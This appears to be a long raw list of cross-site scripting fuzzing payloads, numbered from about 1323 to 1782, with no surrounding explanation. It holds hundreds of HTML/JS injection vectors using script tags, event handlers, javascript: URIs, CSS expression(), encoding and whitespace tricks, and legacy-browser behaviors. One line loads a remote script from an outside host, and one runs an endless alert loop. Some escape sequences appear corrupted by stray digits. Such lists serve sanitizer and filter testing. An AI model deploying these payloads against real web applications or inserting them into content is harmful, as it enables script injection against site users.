ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1323)">DEF
ABC<div style="x:\x00expression(javascript:alert(1324)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1325)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1326)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1327)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1328)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1329)">DEF
ABC<div style="x:\xE2\x80\x81330expression(javascript:alert(1330)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1331)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1332)">DEF
<a href="\x0Bjavascript:javascript:alert(1333)" id="fuzzelement1333">test</a>
<a href="\x0Fjavascript:javascript:alert(1334)" id="fuzzelement1334">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1335)" id="fuzzelement1335">test</a>
<a href="\x05javascript:javascript:alert(1336)" id="fuzzelement1336">test</a>
<a href="\xE1337\xA0\x8Ejavascript:javascript:alert(1337)" id="fuzzelement1337">test</a>
<a href="\x13388javascript:javascript:alert(1338)" id="fuzzelement1338">test</a>
<a href="\x13391339javascript:javascript:alert(1339)" id="fuzzelement1339">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1340)" id="fuzzelement1340">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1341)" id="fuzzelement1341">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1342)" id="fuzzelement1342">test</a>
<a href="\x13437javascript:javascript:alert(1343)" id="fuzzelement1343">test</a>
<a href="\x03javascript:javascript:alert(1344)" id="fuzzelement1344">test</a>
<a href="\x0Ejavascript:javascript:alert(1345)" id="fuzzelement1345">test</a>
<a href="\x1346Ajavascript:javascript:alert(1346)" id="fuzzelement1346">test</a>
<a href="\x00javascript:javascript:alert(1347)" id="fuzzelement1347">test</a>
<a href="\x13480javascript:javascript:alert(1348)" id="fuzzelement1348">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1349)" id="fuzzelement1349">test</a>
<a href="\x20javascript:javascript:alert(1350)" id="fuzzelement1350">test</a>
<a href="\x13513javascript:javascript:alert(1351)" id="fuzzelement1351">test</a>
<a href="\x09javascript:javascript:alert(1352)" id="fuzzelement1352">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1353)" id="fuzzelement1353">test</a>
<a href="\x13544javascript:javascript:alert(1354)" id="fuzzelement1354">test</a>
<a href="\x13559javascript:javascript:alert(1355)" id="fuzzelement1355">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1356)" id="fuzzelement1356">test</a>
<a href="\x1357Fjavascript:javascript:alert(1357)" id="fuzzelement1357">test</a>
<a href="\xE2\x80\x81358javascript:javascript:alert(1358)" id="fuzzelement1358">test</a>
<a href="\x1359Djavascript:javascript:alert(1359)" id="fuzzelement1359">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1360)" id="fuzzelement1360">test</a>
<a href="\x07javascript:javascript:alert(1361)" id="fuzzelement1361">test</a>
<a href="\xE1362\x9A\x80javascript:javascript:alert(1362)" id="fuzzelement1362">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1363)" id="fuzzelement1363">test</a>
<a href="\x04javascript:javascript:alert(1364)" id="fuzzelement1364">test</a>
<a href="\x01365javascript:javascript:alert(1365)" id="fuzzelement1365">test</a>
<a href="\x08javascript:javascript:alert(1366)" id="fuzzelement1366">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1367)" id="fuzzelement1367">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1368)" id="fuzzelement1368">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1369)" id="fuzzelement1369">test</a>
<a href="\x13702javascript:javascript:alert(1370)" id="fuzzelement1370">test</a>
<a href="\x0Djavascript:javascript:alert(1371)" id="fuzzelement1371">test</a>
<a href="\x0Ajavascript:javascript:alert(1372)" id="fuzzelement1372">test</a>
<a href="\x0Cjavascript:javascript:alert(1373)" id="fuzzelement1373">test</a>
<a href="\x13745javascript:javascript:alert(1374)" id="fuzzelement1374">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1375)" id="fuzzelement1375">test</a>
<a href="\x13766javascript:javascript:alert(1376)" id="fuzzelement1376">test</a>
<a href="\x02javascript:javascript:alert(1377)" id="fuzzelement1377">test</a>
<a href="\x1378Bjavascript:javascript:alert(1378)" id="fuzzelement1378">test</a>
<a href="\x06javascript:javascript:alert(1379)" id="fuzzelement1379">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1380)" id="fuzzelement1380">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1381)" id="fuzzelement1381">test</a>
<a href="\x1382Ejavascript:javascript:alert(1382)" id="fuzzelement1382">test</a>
<a href="\xE2\x81383\x9Fjavascript:javascript:alert(1383)" id="fuzzelement1383">test</a>
<a href="\x1384Cjavascript:javascript:alert(1384)" id="fuzzelement1384">test</a>
<a href="javascript\x00:javascript:alert(1385)" id="fuzzelement1385">test</a>
<a href="javascript\x3A:javascript:alert(1386)" id="fuzzelement1386">test</a>
<a href="javascript\x09:javascript:alert(1387)" id="fuzzelement1387">test</a>
<a href="javascript\x0D:javascript:alert(1388)" id="fuzzelement1388">test</a>
<a href="javascript\x0A:javascript:alert(1389)" id="fuzzelement1389">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1390)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1391)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1392)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1393)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1394)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1395)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1396)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1397)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1398)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1399)>
"`'><script>\x3Bjavascript:alert(1400)</script>
"`'><script>\x0Djavascript:alert(1401)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1402)</script>
"`'><script>\xE2\x80\x81403javascript:alert(1403)</script>
"`'><script>\xE2\x80\x84javascript:alert(1404)</script>
"`'><script>\xE3\x80\x80javascript:alert(1405)</script>
"`'><script>\x09javascript:alert(1406)</script>
"`'><script>\xE2\x80\x89javascript:alert(1407)</script>
"`'><script>\xE2\x80\x85javascript:alert(1408)</script>
"`'><script>\xE2\x80\x88javascript:alert(1409)</script>
"`'><script>\x00javascript:alert(1410)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1411)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1412)</script>
"`'><script>\xE1413\x9A\x80javascript:alert(1413)</script>
"`'><script>\x0Cjavascript:alert(1414)</script>
"`'><script>\x2Bjavascript:alert(1415)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1416)</script>
"`'><script>-javascript:alert(1417)</script>
"`'><script>\x0Ajavascript:alert(1418)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1419)</script>
"`'><script>\x7Ejavascript:alert(1420)</script>
"`'><script>\xE2\x80\x87javascript:alert(1421)</script>
"`'><script>\xE2\x81422\x9Fjavascript:alert(1422)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1423)</script>
"`'><script>\xC2\x85javascript:alert(1424)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1425)</script>
"`'><script>\xE2\x80\x83javascript:alert(1426)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1427)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1428)</script>
"`'><script>\xE2\x80\x80javascript:alert(1429)</script>
"`'><script>\x21430javascript:alert(1430)</script>
"`'><script>\xE2\x80\x82javascript:alert(1431)</script>
"`'><script>\xE2\x80\x86javascript:alert(1432)</script>
"`'><script>\xE1433\xA0\x8Ejavascript:alert(1433)</script>
"`'><script>\x0Bjavascript:alert(1434)</script>
"`'><script>\x20javascript:alert(1435)</script>
"`'><script>\xC2\xA0javascript:alert(1436)</script>
"/><img/onerror=\x0Bjavascript:alert(1437)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1438)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1439)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1440)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1441)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1442)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1443)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1444)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1445)\x20src=xxx:x />
<script\x2F>javascript:alert(1446)</script>
<script\x20>javascript:alert(1447)</script>
<script\x0D>javascript:alert(1448)</script>
<script\x0A>javascript:alert(1449)</script>
<script\x0C>javascript:alert(1450)</script>
<script\x00>javascript:alert(1451)</script>
<script\x09>javascript:alert(1452)</script>
"><img src=x onerror=javascript:alert(1453)>
"><img src=x onerror=javascript:alert(1454)>
"><img src=x onerror=javascript:alert(1455)>
"><img src=x onerror=javascript:alert(1456)>
"><img src=x onerror=javascript:alert(1457))>
"><img src=x onerror=javascript:alert(1458))>
"><img src=x onerror=javascript:alert(1459))>
"><img src=x onerror=javascript:alert(1460)>
"><img src=x onerror=javascript:alert(1461))>
"><img src=x onerror=javascript:alert(1462))>
"><img src=x onerror=javascript:alert(1463)>
"><img src=x onerror=javascript:alert(1464))>
"><img src=x onerror=javascript:alert(1465)>
"><img src=x onerror=javascript:alert(1466))>
"><img src=x onerror=javascript:alert(1467)>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1468)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1469)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1470)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1471)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1472)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1473)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1474)>
<script>javascript:alert(1475)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1476)" >
<input onfocus=javascript:alert(1477) autofocus>
<input onblur=javascript:alert(1478) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1479)//
<body onscroll=javascript:alert(1480)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1481)><input></form><button form=test onformchange=javascript:alert(1481)>X
<video><source onerror="javascript:javascript:alert(1482)">
<video onerror="javascript:javascript:alert(1483)"><source>
<form><button formaction="javascript:javascript:alert(1484)">X
<body oninput=javascript:alert(1485)><input autofocus>
<math href="javascript:javascript:alert(1486)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1486)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1487)>
<table background="javascript:javascript:alert(1488)">
<!--<img src="--><img src=x onerror=javascript:alert(1489)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1490))//">
<![><img src="]><img src=x onerror=javascript:alert(1491)//">
<style><img src="</style><img src=x onerror=javascript:alert(1492)//">
<li style=list-style:url() onerror=javascript:alert(1493)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1493)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1494)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1495)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-14961496D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1496)"></OBJECT>
<b <script>alert(1497)</script>0
<div id="div1498"><input value="``onmouseover=javascript:alert(1498)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1498").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1499)//'>
<embed src="javascript:alert(1500)">
<img src="javascript:alert(1501)">
<image src="javascript:alert(1502)">
<script src="javascript:alert(1503)">
<div style=width:1504px;filter:glow onfilterchange=javascript:alert(1504)>x
<? foo="><script>javascript:alert(1505)</script>">
<! foo="><script>javascript:alert(1506)</script>">
</ foo="><script>javascript:alert(1507)</script>">
<? foo="><x foo='?><script>javascript:alert(1508)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1509)</script>">
<% foo><x foo="%><script>javascript:alert(1510)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1511)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1512)">
<img \x47src=x onerror="javascript:alert(1513)">
<img \x15141514src=x onerror="javascript:alert(1514)">
<img \x15152src=x onerror="javascript:alert(1515)">
<img\x47src=x onerror="javascript:alert(1516)">
<img\x15170src=x onerror="javascript:alert(1517)">
<img\x15183src=x onerror="javascript:alert(1518)">
<img\x32src=x onerror="javascript:alert(1519)">
<img\x47src=x onerror="javascript:alert(1520)">
<img\x15211521src=x onerror="javascript:alert(1521)">
<img \x47src=x onerror="javascript:alert(1522)">
<img \x34src=x onerror="javascript:alert(1523)">
<img \x39src=x onerror="javascript:alert(1524)">
<img \x00src=x onerror="javascript:alert(1525)">
<img src\x09=x onerror="javascript:alert(1526)">
<img src\x15270=x onerror="javascript:alert(1527)">
<img src\x15283=x onerror="javascript:alert(1528)">
<img src\x32=x onerror="javascript:alert(1529)">
<img src\x15302=x onerror="javascript:alert(1530)">
<img src\x15311531=x onerror="javascript:alert(1531)">
<img src\x00=x onerror="javascript:alert(1532)">
<img src\x47=x onerror="javascript:alert(1533)">
<img src=x\x09onerror="javascript:alert(1534)">
<img src=x\x15350onerror="javascript:alert(1535)">
<img src=x\x15361536onerror="javascript:alert(1536)">
<img src=x\x15372onerror="javascript:alert(1537)">
<img src=x\x15383onerror="javascript:alert(1538)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1539)">
<img src=x onerror=\x09"javascript:alert(1540)">
<img src=x onerror=\x15410"javascript:alert(1541)">
<img src=x onerror=\x15421542"javascript:alert(1542)">
<img src=x onerror=\x15432"javascript:alert(1543)">
<img src=x onerror=\x32"javascript:alert(1544)">
<img src=x onerror=\x00"javascript:alert(1545)">
<a href=java؊�㱦script:javascript:alert(1546)>XXX</a>
<img src="x` `<script>javascript:alert(1547)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1548)//">
<title onpropertychange=javascript:alert(1549)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1550)></a>">
<!--[if]><script>javascript:alert(1551)</script -->
<!--[if<img src=x onerror=javascript:alert(1552)//]> -->
<object id="x" classid="clsid:CB927D15532-4FF7-4a9e-A155369-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C15537-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1553)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1554)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1555)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1556))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1557))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1558);">XXX</a></a><a href="javascript:javascript:alert(1558)">XXX</a>
<// style=x:expression\28javascript:alert(1559)\29>
<style>*{x:expression(javascript:alert(1560))}</style>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1561));">X
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1562)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1563))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1564)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1565)')()</script>
<meta charset="mac-farsi">¼script¾javascript:alert(1566)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1567)` >
1568<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh񁕨vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1568)>`>
1569<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1569)>>
1570<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1570) strokecolor=white strokeweight=1570000px from=0 to=1570000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1571)">XXX</a>
<event-source src="%(event)s" onload="javascript:alert(1572)">
<a href="javascript:javascript:alert(1573)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img�src=x:x�onerror�=javascript:alert(1574)>">
<script>javascript:alert(1575)</script>
<IMG SRC="javascript:javascript:alert(1576);">
<IMG SRC=javascript:javascript:alert(1577)>
<IMG SRC=`javascript:javascript:alert(1578)`>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1579);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1580)>
<BODY ONLOAD=javascript:javascript:alert(1581)>
<IMG SRC="jav ascript:javascript:alert(1582);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1583)>
<IMG SRC="javascript:javascript:alert(1584)"
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1585);">
<IMG DYNSRC="javascript:javascript:alert(1586)">
<IMG LOWSRC="javascript:javascript:alert(1587)">
<BGSOUND SRC="javascript:javascript:alert(1588);">
<BR SIZE="&{javascript:alert(1589)}">
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1590);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(1591)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1592);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1593);">
<IFRAME SRC="javascript:javascript:alert(1594);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1595)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1596)">
<DIV STYLE="background-image: url(javascript:javascript:alert(1597))">
<DIV STYLE="width:expression(javascript:alert(1598));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1599))">
<XSS STYLE="xss:expression(javascript:alert(1600))">
<STYLE TYPE="text/javascript">javascript:alert(1601);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1602)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1603)")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:alert(1604);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(1605);//">
<OBJECT classid=clsid:ae24fdae-03c6-16061606d1606-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1606)></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1607)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1608)</SCRIPT>"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1609)">X
<body onscroll=javascript:alert(1610)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1611)">
<STYLE>a{background:url('s1612' 's2)}@import javascript:javascript:alert(1612);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1613)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1614);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1615);></style>
<?xml version="1616.0"?><html:html xmlns:html='http://www.w3.org/1616999/xhtml'><html:script>javascript:alert(1616);</html:script></html:html>
<embed code=javascript:javascript:alert(1617);></embed>
<frameset onload=javascript:javascript:alert(1618)></frameset>
<object onerror=javascript:javascript:alert(1619)>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1620);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1621);};>
<a href="javAascript:javascript:alert(1622)">test1622</a>
<a href="javaascript:javascript:alert(1623)">test1623</a>
<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1624)&gt;>">
';alert(1625))//';alert(1625))//";
alert(1626))//";alert(1626))//--
></SCRIPT>">'><SCRIPT>alert(1627))</SCRIPT>
<IMG SRC="javascript:alert(1628);">
<IMG SRC=javascript:alert(1629)>
<IMG SRC=JaVaScRiPt:alert(1630)>
<IMG SRC=javascript:alert(1631)>
<IMG SRC=`javascript:alert(1632)`>
<a onmouseover="alert(1633)">xxs link</a>
<a onmouseover=alert(1634)>xxs link</a>
<IMG """><SCRIPT>alert(1635)</SCRIPT>">
<IMG SRC=javascript:alert(1636))>
<IMG SRC=# onmouseover="alert(1637)">
<IMG SRC= onmouseover="alert(1638)">
<IMG onmouseover="alert(1639)">
<IMG SRC="jav ascript:alert(1640);">
<IMG SRC="jav	ascript:alert(1641);">
<IMG SRC="jav
ascript:alert(1642);">
<IMG SRC="jav
ascript:alert(1643);">
perl -e 'print "<IMG SRC=java\0script:alert(1644)>";' > out
<IMG SRC="  javascript:alert(1645);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1646)>
<<SCRIPT>alert(1647);//<</SCRIPT>
<IMG SRC="javascript:alert(1648)"
\";alert(1649);//
</TITLE><SCRIPT>alert(1650);</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1651);">
<BODY BACKGROUND="javascript:alert(1652)">
<IMG DYNSRC="javascript:alert(1653)">
<IMG LOWSRC="javascript:alert(1654)">
<STYLE>li {list-style-image: url("javascript:alert(1655)");}</STYLE><UL><LI>XSS</br>
<BODY ONLOAD=alert(1656)>
<BGSOUND SRC="javascript:alert(1657);">
<BR SIZE="&{alert(1658)}">
<LINK REL="stylesheet" HREF="javascript:alert(1659);">
<STYLE>@im\port'\ja\vasc\ript:alert(1660)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(1661))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(1662))'>
<STYLE TYPE="text/javascript">alert(1663);</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(1664)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(1665)")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert(1666)")}</STYLE>
<XSS STYLE="xss:expression(alert(1667))">
¼script¾alert(1668)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1669);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1670);">
<IFRAME SRC="javascript:alert(1671);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(1672)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(1673);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1674)">
<TABLE><TD BACKGROUND="javascript:alert(1675)">
<DIV STYLE="background-image: url(javascript:alert(1676))">
<DIV STYLE="background-image: url(javascript:alert(1677))">
<DIV STYLE="width: expression(alert(1678));">
<BASE HREF="javascript:alert(1679);//">
<? echo('<SCR)';echo('IPT>alert(1680)</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1681)</SCRIPT>"><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1682);+ADw-/SCRIPT+AD4-
<img src=``
 onerror=alert(1683)

<script /**/>/**/alert(1684)/**/</script /**/
<iframe/src="data:text/html,<svg ��load=alert(1685)>">
<meta content="
 1686 
; JAVASCRIPT: alert(1686)" http-equiv="refresh"/>
<form><iframe 	䇦� src="javascript:alert(1687)"�䇦	;>
http://www.google<script .com>alert(1688)</script
<script ^__^>alert(1689))</script ^__^
</style  ><script   :-(>/**/alert(1690)/**/</script   :-(
�</form><input type"date" onfocus="alert(1691)">
<a href="javascript:void(0)" onmouseover=
javascript:alert(1692)
>X</a>
<script ~~~>alert(1693)</script ~~~>
<iframe// src=javaSCRIPT:alert(1694)
<%<!--'%><script>alert(1695);</script -->
<script src="data:text/javascript,alert(1696)"></script>
<iframe/onreadystatechange=alert(1697)
<svg/onload=alert(1698)
<input type="text" value=`` <div/onmouseover='alert(1699)'>X</div>
<img src=`xx:xx`onerror=alert(1700)>
<meta http-equiv="refresh" content="0;javascript:alert(1701)"/>
<script>+-+-1702-+-+alert(1702)</script>
<body/onload=<!-->䊆alert(1703)>
<script itworksinallbrowsers>/*<script* */alert(1704)</script
<img src ?itworksonchrome?\/onerror = alert(1705)
<svg><script onlypossibleinopera:-)> alert(1706)
<script x> alert(1707) </script 1707=2
<div/onmouseover='alert(1708)'> style="x:">
<--`<img/src=` onerror=alert(1709)> --!>
<div style="position:absolute;top:0;left:0;width:171000%;height:171000%" onmouseover="prompt(1710)" onclick="alert(1710)">x</button>
<form><button formaction=javascript:alert(1711)>CLICKME
<script>alert(1712);</script>
<script>alert(1713);</script>
<IMG SRC="javascript:alert(1714);">
<IMG SRC=javascript:alert(1715)>
<IMG SRC=javascript:alert(1716)>
<IMG SRC=javascript:alert(1717)>
<IMG """><SCRIPT>alert(1718)</SCRIPT>">
<scr<script>ipt>alert(1719);</scr</script>ipt>
<script>alert(1720))</script>
<img src=foo.png onerror=alert(1721) />
<style>@im\port'\ja\vasc\ript:alert(1722)';</style>
<? echo('<scr)'; echo('ipt>alert(1723)</script>'); ?>
<marquee><script>alert(1724)</script></marquee>
<IMG SRC=\"jav	ascript:alert(1725);\">
<IMG SRC=\"jav
ascript:alert(1726);\">
<IMG SRC=\"jav
ascript:alert(1727);\">
<IMG SRC=javascript:alert(1728))>
"><script>alert(1729)</script>
</title><script>alert(1730)</script>
</textarea><script>alert(1731)</script>
<IMG LOWSRC=\"javascript:alert(1732)\">
<IMG DYNSRC=\"javascript:alert(1733)\">
<font style='color:expression(alert(1734))'>
<img src="javascript:alert(1735)">
<script language="JavaScript">alert(1736)</script>
<body onunload="javascript:alert(1737);">
<body onLoad="alert(1738);"
[color=red' onmouseover="alert(1739)"]mouse over[/color]
"/></a></><img src=1740.gif onerror=alert(1740)>
window.alert(1741);
alert(1742));'))">
<iframe<?php echo chr(11)?> onload=alert(1743)></iframe>
"><script alert(1744))</script>
'">><script>alert(1745)</script>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(1746);\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(1747);\">
<script>1748 1748 = 1; alert(1748)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert(1749)")}</STYLE>
<?='<SCRIPT>alert(1750)</SCRIPT>'?>
" onfocus=alert(1751) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert(1752);\"></FRAMESET>
<STYLE>li {list-style-image: url(\"javascript:alert(1753)\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(1754)</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(1755)>\";' > out
<br size=\"&{alert(1756)}\">
<scrscriptipt>alert(1757)</scrscriptipt>
</script><script>alert(1759)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1760)>
[color=red width=expression(alert(1761))][color]
<BASE HREF="javascript:alert(1762);//">
"></iframe><script>alert(1763)</script>
<body onLoad="while(true) alert(1764);">
'"></title><script>alert(1765)</script>
</textarea>'"><script>alert(1766)</script>
'""><script language="JavaScript"> alert(1767);</script>
</script></script><<<<script><>>>><<<script>alert(1768)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1769);">
'></select><script>alert(1770)</script>
a="get";b="URL";c="javascript:";d="alert(1771);";eval(a+b+c+d);
='><script>alert(1772)</script>
<body background=javascript:'"><script>alert(1773)</script>></body>
">/XaDoS/><script>alert(1774)</script><script src="http://www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(1775)</script>
!--" /><script>alert(1776);</script>
<script>alert(1777)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(1778)</script>><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert(1779)</script>><marquee><h1>XSS by xss</h1></marquee>
<img """><script>alert(1780)</script><marquee><h1>XSS by xss</h1></marquee>
<script>alert(1781)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(1782)</script>"><script>alert("XSS by \nxss</h1></marquee>
